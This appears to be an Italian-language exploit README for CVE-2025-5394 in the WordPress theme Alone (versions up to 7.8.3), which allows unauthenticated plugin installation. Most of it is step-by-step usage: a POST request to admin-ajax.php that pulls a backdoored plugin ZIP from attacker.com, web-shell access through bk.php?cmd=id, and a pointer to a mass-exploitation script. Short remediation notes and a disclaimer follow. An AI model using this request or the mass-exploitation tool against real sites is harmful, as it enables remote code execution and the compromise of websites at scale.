
Alone – Tema WordPress Multiuso No-profit per Beneficenza <= 7.8.3 - Mancanza di autorizzazione che consente il caricamento arbitrario di file senza autenticazione tramite l'installazione di plugin
🔥 Riepilogo della Vulnerabilità
Il tema WordPress Alone nelle versioni <= 7.8.3 è vulnerabile a un caricamento arbitrario di file non autenticato. Questa falla consente a attaccanti non autenticati di caricare e installare file ZIP di plugin arbitrari da URL remoti tramite un endpoint AJAX non protetto — con conseguente esecuzione remota di codice (RCE) tramite la distribuzione di plugin con backdoor.
Questa vulnerabilità deriva dalla funzione beplus_import_pack_install_plugin esposta al pubblico tramite wp_ajax_nopriv_ senza alcun controllo di autenticazione o delle capability. La funzione installa e attiva un plugin da un URL fornito dall'utente.
🔍 Tema Interessato
🧪 Caratteristiche dell'Exploit
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 Ricercatore
🚀 Utilizzo
Prepara un file ZIP di plugin dannoso ospitato su un server che controlli.
Plugin Name:) e un backdoor PHP (es., bk.php)Costruisci la seguente richiesta POST:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
In caso di successo, il plugin viene installato e attivato. Accedi alla tua shell all'indirizzo:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 Script di Sfruttamento di Massa Questo repository include uno strumento di sfruttamento di massa con:
result.txtVedi mass_beplus_exploit.py per i dettagli.
🛠 Raccomandazioni di Correzione
wp_ajax_nopriv_beplus_import_pack_install_plugin.current_user_can('install_plugins'))🔒 Disclaimer:
Queste informazioni sono fornite esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso o l'uso non autorizzato di sistemi informatici è illegale e contrario all'etica.
📚 Riferimento:
CVE: CVE-2025-5394
Ricercatore: Thai An